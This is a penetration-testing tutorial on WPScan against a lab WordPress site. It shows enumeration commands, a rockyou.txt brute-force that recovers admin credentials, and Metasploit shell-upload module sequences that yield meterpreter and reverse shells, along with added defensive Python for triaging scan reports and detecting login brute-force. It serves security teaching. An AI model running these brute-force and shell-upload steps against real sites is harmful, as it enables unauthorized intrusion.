WPScan

The document provides an overview of WPScan, a powerful WordPress vulnerability scanner used for penetration testing. It details various functionalities of WPScan, including enumerating WordPress versions, themes, plugins, and usernames, as well as methods for exploiting vulnerabilities through brute-force attacks and shell uploads. Additionally, it explains how to scan WordPress applications over proxy servers and with HTTP authentication enabled.

WPScan: WordPress Pentesting Framework

1|Page
WPScan: WordPress Pentesting Framework

Contents
Introduction ........ 3
Introduction to WPScan ........ 3
Let's check out the major things that WPScan can do for us ........ 3
Enumerating the WordPress web application ........ 3
Scanning the WordPress version of the target's website ........ 4
Enumerating WordPress Themes ........ 6
Enumerating WordPress Plugins ........ 8
Enumerating WordPress Usernames ........ 10
Enumerate ALL with a single command ........ 10
WordPress Exploitation ........ 11
Brute-force attack using WPScan ........ 11
Shell Upload using Metasploit ........ 12
Vulnerable Plugin Exploitation ........ 13
Scanning over a Proxy Server ........ 14
Scanning with HTTP Authentication enabled ........ 15

Introduction
Almost every other web application on the internet runs on a Content Management System, often
WordPress, Squarespace, Joomla, or another platform chosen during its development phase. Is your
website one of them? In this article, we'll attempt to compromise such WordPress websites using one
of the most powerful WordPress vulnerability scanners, namely WPScan.

Introduction to WPScan
"WordPress is one of the most powerful CMS platforms, covering about 35% of all websites on the
internet." Thus, to enumerate such web applications we'll use WPScan, a black-box vulnerability
scanner for WordPress, written in Ruby, that focuses on the different vulnerabilities present in
WordPress applications, whether in the core, its themes, or its plugins.

WPScan comes preinstalled in Kali Linux, SamuraiWTF, Pentoo and BlackArch. It compares what it finds
on the target against its own vulnerability database to identify outdated versions and known
vulnerabilities in the target's web application.

Let's check out the major things that WPScan can do for us:
• Detect the version of the currently installed WordPress.
• Detect sensitive files like readme, robots.txt, database backup files, etc.
• Detect enabled features on the currently installed WordPress server, such as file_upload.
• Enumerate the themes and plugins along with their versions and tell whether they are outdated or
not.
• Scan the web application to list the available usernames.

Before going deeper, I suggest you check out our previous article where we've discussed the
"Multiple ways to set up a WordPress Penetration Testing Lab".

Let’s start!!

Enumerating the WordPress web application


As discussed earlier, WPScan is installed by default on Kali Linux machines, so let's check out the
default usage options by simply firing the following command in the terminal.

wpscan -hh

Scanning the WordPress version of the target’s website


Now that we've seen the default options, let's try a basic scan of the vulnerable WordPress web
application that we set up in our earlier article.

Type the following command to scan the WordPress application and its server.

wpscan --url http://192.168.1.105/wordpress/


From the below image you can see that it dumps everything it could: the WordPress version, the
Apache server version, and it even found that the upload directory has directory listing enabled,
which means anyone can browse to "/wp-content/uploads" to view the uploaded files and their
contents.

Enumerating WordPress Themes


Themes play an important role in any CMS web application: they control the general look and feel of
the website, including its page layout, widget locations, and the default font and colour preferences.

WPScan uses its database, which contains about 2600 themes, to check for vulnerable themes installed
on the target.

To check the installed themes of the target's WordPress web application, type the following
command:

wpscan --url http://192.168.1.105/wordpress/ -e at


The "-e" flag selects enumeration, and the "at" value stands for "all themes".

You can also use other values, such as "vt", to list only the vulnerable themes.

Running the above command, we will be presented with the installed themes along with their versions.

Enumerating WordPress Plugins


Plugins are small pieces of code that, when added to a WordPress web application, boost its
functionality and enhance the website's features.

But these plugins can sometimes cause great damage to the web application due to their loosely
written code.

Let's check out the installed plugins on our target's web application by executing the below
command:

wpscan --url http://192.168.1.105/wordpress/ -e ap


Similar to the themes, we can also list only the vulnerable plugins by using "-e vp".

After waiting a few seconds, WPScan will dump our desired result. From the below image, you can see
that the plugins "mail-masta" and "reflex-gallery" are installed on our target's website. As a bonus,
we also get the last update date and the latest available version.

Enumerating WordPress Usernames


To list the usernames of our target website's privileged users, execute the following command:

wpscan --url http://192.168.1.105/wordpress/ -e u


The "u" value grabs all the usernames and presents them as a list on our screen.

When WPScan completes its work, we'll find a list of all the users with their user IDs, along with
the method by which each one was found.

Enumerate ALL with a single command


Does WPScan let us scan the web application for everything in one go, whether it is the version,
the installed themes, or the plugins?

Let's check this out!

Fire up the following command to grab everything we scanned above for our target web application.

wpscan --url http://192.168.1.105/wordpress/ -e at,ap,u

The "-e" option accepts a comma-separated list of enumeration targets:
• at: enumerate all themes of the targeted website
• ap: enumerate all plugins of the targeted website
• u: enumerate all usernames of the targeted website
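When running the combined scan against your own site, WPScan's JSON output is easier to act on than the screen dump. The following added example (not code from the original article or from WPScan itself) triages such a report: the sample report is constructed by hand to mirror the layout of `--format json` output, so its field names ("outdated", "latest_version", "vulnerabilities", "users") are assumptions based on that format and every version number in it is made up.

```python
"""Triage a WPScan JSON report (wpscan ... --format json -o report.json)."""
import json

# Constructed sample, not real WPScan output. Plugin slugs come from the article;
# versions and the vulnerability entry are placeholders.
SAMPLE_REPORT = json.dumps({
    "version": {"number": "5.4", "status": "outdated"},
    "themes": {
        "twentytwenty": {"version": {"number": "1.2"}, "latest_version": "1.2",
                         "outdated": False, "vulnerabilities": []},
    },
    "plugins": {
        "reflex-gallery": {"version": {"number": "1.0"}, "latest_version": "1.3",
                           "outdated": True, "vulnerabilities": []},
        "slideshowgallery": {"version": {"number": "1.0"}, "latest_version": "1.2",
                             "outdated": True,
                             "vulnerabilities": [{"title": "EXAMPLE: authenticated file upload",
                                                  "fixed_in": "1.1"}]},
    },
    "users": {"admin": {"id": 1}, "raj": {"id": 2}},
})

SEVERITY = {"vulnerable": 0, "outdated": 1}    # lower number = handle first


def triage(report_json):
    """Return core version info, enumerated users and a severity-sorted finding list."""
    r = json.loads(report_json)
    findings = []
    for kind in ("themes", "plugins"):
        for slug, info in (r.get(kind) or {}).items():
            ver = (info.get("version") or {}).get("number", "unknown")
            # A component with a known vulnerability is more urgent than one that is merely old.
            for v in info.get("vulnerabilities") or []:
                findings.append({"kind": kind, "slug": slug, "status": "vulnerable",
                                 "detail": f"{ver}: {v.get('title')} (fixed in {v.get('fixed_in', '?')})"})
            if info.get("outdated"):
                findings.append({"kind": kind, "slug": slug, "status": "outdated",
                                 "detail": f"{ver} -> {info.get('latest_version')}"})
    findings.sort(key=lambda f: (SEVERITY[f["status"]], f["slug"]))
    return {"core": r.get("version") or {}, "users": sorted(r.get("users") or {}), "findings": findings}


if __name__ == "__main__":
    res = triage(SAMPLE_REPORT)
    print("WordPress", res["core"].get("number"), res["core"].get("status"))
    for f in res["findings"]:
        print(f"[{f['status']:<10}] {f['kind'][:-1]} {f['slug']}: {f['detail']}")
    print("users exposed:", ", ".join(res["users"]))
```

Every username in the list is a login name an attacker can feed to the brute-force step below, so the user list is itself a finding worth reducing.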

WordPress Exploitation
Brute-force attack using WPScan
With the help of the usernames we enumerated earlier, we can create a word list of all the users
and try a brute-force login attack using the default password list "rockyou.txt". You can learn
more about cracking WordPress logins from here.

From the below image you can see our designed wordlist.

Let's now try to exploit the website by cracking its login credentials using the following command:

wpscan --url http://192.168.1.105/wordpress/ -U user.txt -P /usr/share/wordlists/rockyou.txt


The -U and -P flags set the username list and the password list respectively.

WPScan tries each username and password combination and then dumps the result; from the given
image you can see we found the login credentials.

Great!! We got the admin credentials as "admin: jessica". Let's try to get into the application's
dashboard with them.
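On the defending side, the attack above is loud: every guess is a POST to wp-login.php, a failed guess re-renders the form (HTTP 200) and the first correct guess redirects to the dashboard (HTTP 302). The following added example (not from the original article) runs that detection over constructed Apache combined-log lines; the threshold, window and the 200/302 heuristic are assumptions you would tune to your own site.

```python
"""Flag wp-login.php / xmlrpc.php password-guessing bursts in Apache combined logs."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log: six POSTs in six seconds from one client, the last one a 302
# (a successful login), plus unrelated traffic from a second client.
SAMPLE_LOG = """\
192.168.1.10 - - [10/Oct/2020:13:55:36 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 4312
192.168.1.10 - - [10/Oct/2020:13:55:37 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 4312
192.168.1.10 - - [10/Oct/2020:13:55:38 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 4312
192.168.1.20 - - [10/Oct/2020:13:55:39 +0000] "GET /wordpress/ HTTP/1.1" 200 9871
192.168.1.10 - - [10/Oct/2020:13:55:40 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 4312
192.168.1.10 - - [10/Oct/2020:13:55:41 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 4312
192.168.1.10 - - [10/Oct/2020:13:55:42 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0
192.168.1.20 - - [10/Oct/2020:14:10:00 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 4312
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")   # xmlrpc.php is the other common guessing channel


def parse(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    return e


def detect_bruteforce(lines, threshold=5, window_s=60):
    """Return one alert per client IP whose login POSTs exceed threshold within window_s."""
    attempts = defaultdict(list)                  # ip -> sorted [(timestamp, status)]
    for line in lines:
        e = parse(line)
        if e and e["method"] == "POST" and e["path"].split("?")[0].endswith(LOGIN_PATHS):
            attempts[e["ip"]].append((e["ts"], e["status"]))
    alerts = []
    for ip, evts in attempts.items():
        evts.sort()
        best = []
        for i in range(len(evts)):                # widest burst starting at each event
            j = i
            while j + 1 < len(evts) and (evts[j + 1][0] - evts[i][0]).total_seconds() <= window_s:
                j += 1
            if j - i + 1 > len(best):
                best = evts[i:j + 1]
        if len(best) >= threshold:
            # A 302 after a run of 200s means one of the guesses worked: escalate, not just block.
            alerts.append({"ip": ip, "attempts": len(best),
                           "likely_success": any(s == 302 for _, s in best)})
    return alerts
```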

Shell Upload using Metasploit


Isn’t it great if you get the target’s shell?

Run the following commands to get a meterpreter session on our target's web application.

msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set rhosts 192.168.1.105
msf exploit(wp_admin_shell_upload) > set username admin
msf exploit(wp_admin_shell_upload) > set password jessica
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit

This module takes an administrator username and password, logs into the admin panel, and uploads
a payload packaged as a WordPress plugin. Finally, it gives us a meterpreter session on the
web server.

Vulnerable Plugin Exploitation


On our website we found a vulnerable plugin, "slideshowgallery", which contains an authenticated
file upload vulnerability. To exploit it, we will use the following module, which will give us a
reverse shell.

msf > use exploit/unix/webapp/wp_slideshowgallery_upload
msf exploit(wp_slideshowgallery_upload) > set rhosts 192.168.1.105
msf exploit(wp_slideshowgallery_upload) > set targeturi /wordpress
msf exploit(wp_slideshowgallery_upload) > set username admin
msf exploit(wp_slideshowgallery_upload) > set password jessica
msf exploit(wp_slideshowgallery_upload) > exploit

From the below image you can see that we've successfully captured our target's meterpreter session.

Scanning over a Proxy Server


Is it possible to scan a WordPress web application running behind a proxy server?

Many web applications sit behind proxy servers for security, but WPScan lets us scan such web
applications through the proxy using the "--proxy" flag.

Let's check out how:

Our WordPress web application is now running behind a proxy server on port 3128. You can learn
more about how to set up a proxy server from here.

Now if we try to scan it with the default options, we'll get an error and our scan will halt. So,
let's point WPScan at the proxy port in order to scan the web application.

Simply run the following command to scan through this proxy server:

wpscan --url http://192.168.1.105/wordpress/ --proxy http://192.168.1.105:3128


From the below image you can see that we are back in the scanning section.

Scanning with HTTP Authentication enabled


Many websites enable HTTP authentication so that they can hide essential and critical
information from unauthenticated users.

We have set up similar protection on our website with the credentials "raj : 123". To learn
more about HTTP authentication, click here.

From the below image you can see that when we tried the normal scan, we got an alert saying "Please
provide it with --http-auth".

Following this alert, we used --http-auth and entered our credentials.

wpscan --url http://192.168.1.105/wordpress/ --http-auth raj:123


And there we go, our scan has been started now.